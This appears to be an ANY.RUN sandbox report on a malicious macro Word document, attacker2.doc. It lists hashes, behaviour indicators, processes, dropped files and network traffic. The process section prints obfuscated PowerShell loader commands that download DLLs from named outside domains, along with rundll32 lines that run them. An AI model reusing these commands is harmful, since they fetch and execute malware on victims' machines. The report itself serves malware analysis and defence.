Malware analysis attacker2.doc Malicious activity | ANY.RUN

Add for printing

File name:	attacker2.doc
Full analysis:	https://app.any.run/tasks/00dda852-c8ae-4a08-8a4d-2f5e2710be55
Verdict:	Malicious activity
Analysis date:	February 16, 2025, 09:41:27
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	macros macros-on-open generated-doc
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: x, Template: Normal.dotm, Last Saved By: x, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Sep 17 07:49:00 2021, Last Saved Time/Date: Fri Sep 17 07:49:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:	E599A656599A2680C9392C7329D9D519
SHA1:	99C8C8AC689A253E99E2727377DD09235EB4183B
SHA256:	22FE1B36EFA9CB3A8F1E71C1D6730D360977FAD6923DCF9CB8A313A975B8AAC7
SSDEEP:	6144:SGgZ4uGnn1FEHYgQ0PX9GjZ4uGfn1FELg:SG2c1FOvx9GzU1Fgg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Microsoft Office executes commands via PowerShell or Cmd
  - WINWORD.EXE (PID: 6416)
- Unusual execution from MS Office
  - WINWORD.EXE (PID: 6416)
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 6416)
- Script downloads file (POWERSHELL)
  - powershell.exe (PID: 3640)
  - powershell.exe (PID: 6200)
  - powershell.exe (PID: 6352)
  - powershell.exe (PID: 3992)
  - powershell.exe (PID: 6724)
- Uses sleep, probably for evasion detection (SCRIPT)
  - cscript.exe (PID: 6968)
SUSPICIOUS
- Detected use of alternative data streams (AltDS)
  - WINWORD.EXE (PID: 6416)
- The process executes VB scripts
  - cmd.exe (PID: 6884)
- Probably obfuscated PowerShell command line is found
  - cscript.exe (PID: 6968)
- Runs shell command (SCRIPT)
  - WINWORD.EXE (PID: 6416)
  - cscript.exe (PID: 6968)
- Starts POWERSHELL.EXE for commands execution
  - cscript.exe (PID: 6968)
- Uses RUNDLL32.EXE to load library
  - cmd.exe (PID: 3172)
  - cmd.exe (PID: 5968)
  - cmd.exe (PID: 5536)
  - cmd.exe (PID: 5308)
  - cmd.exe (PID: 4628)
- Starts CMD.EXE for commands execution
  - cscript.exe (PID: 6968)
INFO
- Creates files in the program directory
  - WINWORD.EXE (PID: 6416)
  - powershell.exe (PID: 3640)
  - powershell.exe (PID: 6352)
  - powershell.exe (PID: 3992)
  - powershell.exe (PID: 6724)
  - powershell.exe (PID: 6200)
- Reads security settings of Internet Explorer
  - cscript.exe (PID: 6968)
- Uses string replace method (POWERSHELL)
  - powershell.exe (PID: 3640)
  - powershell.exe (PID: 3992)
  - powershell.exe (PID: 6352)
  - powershell.exe (PID: 6200)
  - powershell.exe (PID: 6724)
- An automatically generated document
  - WINWORD.EXE (PID: 6416)
- Disables trace logs
  - powershell.exe (PID: 3640)
  - powershell.exe (PID: 6352)
  - powershell.exe (PID: 6200)
  - powershell.exe (PID: 6724)
  - powershell.exe (PID: 3992)
- Checks proxy server information
  - powershell.exe (PID: 6352)
  - powershell.exe (PID: 3640)
  - powershell.exe (PID: 3992)
  - powershell.exe (PID: 6200)
  - powershell.exe (PID: 6724)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 6200)
  - powershell.exe (PID: 3992)
  - powershell.exe (PID: 6352)
  - powershell.exe (PID: 3640)
  - powershell.exe (PID: 6724)
- Remote server returned an error (POWERSHELL)
  - powershell.exe (PID: 6724)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification:	Word 8.0
LanguageCode:	Russian
DocFlags:	Has picture, 1Table, ExtChar
System:	Windows
Word97:	No
Title:	-
Subject:	-
Author:	x
Keywords:	-
Comments:	-
Template:	Normal.dotm
LastModifiedBy:	x
Software:	Microsoft Office Word
CreateDate:	2021:09:17 07:49:00
ModifyDate:	2021:09:17 07:49:00
Security:	None
CodePage:	Windows Cyrillic
Company:	SPecialiST RePack
CharCountWithSpaces:	1
AppVersion:	16
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	-
HeadingPairs:	Название 1
CompObjUserTypeLen:	32
CompObjUserType:	???????? Microsoft Word 97-2003
LastPrinted:	0000:00:00 00:00:00
RevisionNumber:	2
TotalEditTime:	-
Words:	-
Characters:	1
Pages:	1
Paragraphs:	1
Lines:	1

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

159

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

364

rundll32.exe C:\ProgramData\www2.dll,ldr

C:\Windows\System32\rundll32.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows host process (Rundll32)

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll

2192

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

3060

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3172

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3172

"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr

C:\Windows\System32\cmd.exe

—

cscript.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

3464

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3640

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bussiness-z.ml/ze8pCNTIkrIS/pt.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

cscript.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3992

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.com/Gv1iNAuMKZ/pt.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

cscript.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4384

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4628

"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr

C:\Windows\System32\cmd.exe

—

cscript.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

Add for printing

Total events

39 599

Read events

39 257

Write events

322

Delete events

Modification events


(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:	write	Name:	0
Value: 017012000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6416
Operation:	write	Name:	0
Value: 0B0E10A84669D8330B654C8D6421342BBC5C39230046ED84DFBCEF8AE0ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C5119032D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	en-US
Value: 2
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	de-de
Value: 2
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	fr-fr
Value: 2
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	es-es
Value: 2
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	it-it
Value: 2
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	ja-jp
Value: 2
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	ko-kr
Value: 2
(PID) Process:	(6416) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	pt-br
Value: 2

Add for printing

Executable files

Suspicious files

122

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
6416	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin		text
		MD5:CC90D669144261B198DEAD45AA266572	SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
6416	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		binary
		MD5:0D0A7F6E26A8C01925A8F755F547DF40	SHA256:2AD656B85C19F11C0038301CCC99EBE55C71FB2640B53236C4E40146F9C405FC
3640	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3f0poz05.u0h.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6416	WINWORD.EXE	C:\ProgramData\pin.vbs		text
		MD5:9DA69F65CE4E8E57AEF3EA1DD96F42EC	SHA256:A71FE2BCBB17E7CCCCA5A4A7016189421147FA87646AE8C1D9599C31D9B10E79
6416	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CE929399-10A1-4517-B9BB-4E93C881B5CD		xml
		MD5:73715AF3FEC7C3225C987228D8DBB13F	SHA256:D9754846F51C1590A0607793223548C1C0F4AEC78E896853DB5EBF5C04C39C12
6416	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~DF71E77F09E84A275C.TMP		binary
		MD5:2C9599F31D2727D363BF56BCB6DDD1D2	SHA256:0F984B28B64477E349ECA67696259B409F30D4F963E7A7AA7DCFBD4DFE34893A
6416	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres		binary
		MD5:B3D8284494FD78B8851FA8F033DCB262	SHA256:E3F9FE7F8E0A38819C941473C12AD453918A2E9D7DEECCF1B036A885876B4092
6416	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin		text
		MD5:A27AF625CF5DBE713200B025CB18F3CD	SHA256:8766D34914853F85706C3333DC503C34A268850D392201C83DB47031149DE016
6416	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~DF395C55AFE36D34CB.TMP		binary
		MD5:3087C051746FC5AB00CC353ECC577D8F	SHA256:0F984B28B64477E349ECA67696259B409F30D4F963E7A7AA7DCFBD4DFE34893A
6200	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5fh5jydy.4mk.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6416	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl	unknown	—	—	whitelisted
6416	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl	unknown	—	—	whitelisted
1176	svchost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6416	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl	unknown	—	—	whitelisted
6416	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
6416	WINWORD.EXE	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl	unknown	—	—	whitelisted
6416	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl	unknown	—	—	whitelisted
4652	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6416	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl	unknown	—	—	whitelisted
4076	backgroundTaskHost.exe	GET	200	184.30.131.245:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
4712	MoUsoCoreWorker.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	2.16.164.43:80	crl.microsoft.com	Akamai International B.V.	NL	whitelisted
—	—	104.119.109.218:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
5064	SearchApp.exe	2.23.227.215:443	www.bing.com	Ooredoo Q.S.C.	QA	whitelisted
—	—	184.30.131.245:80	ocsp.digicert.com	AKAMAI-AS	US	whitelisted
6416	WINWORD.EXE	52.109.28.46:443	officeclient.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	GB	whitelisted
6416	WINWORD.EXE	52.123.128.14:443	ecs.office.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
6416	WINWORD.EXE	2.22.242.226:443	omex.cdn.office.net	Akamai International B.V.	DE	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	40.127.240.158 20.73.194.208 4.231.128.59	whitelisted
crl.microsoft.com	2.16.164.43 2.16.164.106 2.16.164.81 2.16.164.34 2.16.164.24 2.16.164.40 2.16.164.99 23.48.23.156 23.48.23.143	whitelisted
google.com	142.250.186.174	whitelisted
www.microsoft.com	104.119.109.218 184.30.21.171	whitelisted
www.bing.com	2.23.227.215 2.23.227.208	whitelisted
ocsp.digicert.com	184.30.131.245 2.23.77.188	whitelisted
officeclient.microsoft.com	52.109.28.46	whitelisted
ecs.office.com	52.123.128.14 52.123.129.14	whitelisted
omex.cdn.office.net	2.22.242.226 2.22.242.121 2.22.242.97 2.22.242.98 2.22.242.90 2.22.242.112 2.22.242.104 2.22.242.113	whitelisted
messaging.lifecycle.office.com	52.111.231.8	whitelisted

Threats

PID	Process	Class	Message
2192	svchost.exe	Misc activity	ET INFO DNS Query for Suspicious .ml Domain
6352	powershell.exe	Not Suspicious Traffic	ET INFO OpenSSL Demo CA - Internet Widgits Pty (O)

Add for printing

Process	Message
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.

General Info

attacker2.doc

E599A656599A2680C9392C7329D9D519

99C8C8AC689A253E99E2727377DD09235EB4183B

22FE1B36EFA9CB3A8F1E71C1D6730D360977FAD6923DCF9CB8A313A975B8AAC7

6144:SGgZ4uGnn1FEHYgQ0PX9GjZ4uGfn1FELg:SG2c1FOvx9GzU1Fgg

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Microsoft Office executes commands via PowerShell or Cmd

Unusual execution from MS Office

Starts CMD.EXE for commands execution

Script downloads file (POWERSHELL)

Uses sleep, probably for evasion detection (SCRIPT)

SUSPICIOUS

Detected use of alternative data streams (AltDS)

The process executes VB scripts

Probably obfuscated PowerShell command line is found

Runs shell command (SCRIPT)

Starts POWERSHELL.EXE for commands execution

Uses RUNDLL32.EXE to load library

Starts CMD.EXE for commands execution

INFO

Creates files in the program directory

Reads security settings of Internet Explorer

Uses string replace method (POWERSHELL)

An automatically generated document

Disables trace logs

Checks proxy server information

Script raised an exception (POWERSHELL)

Remote server returned an error (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings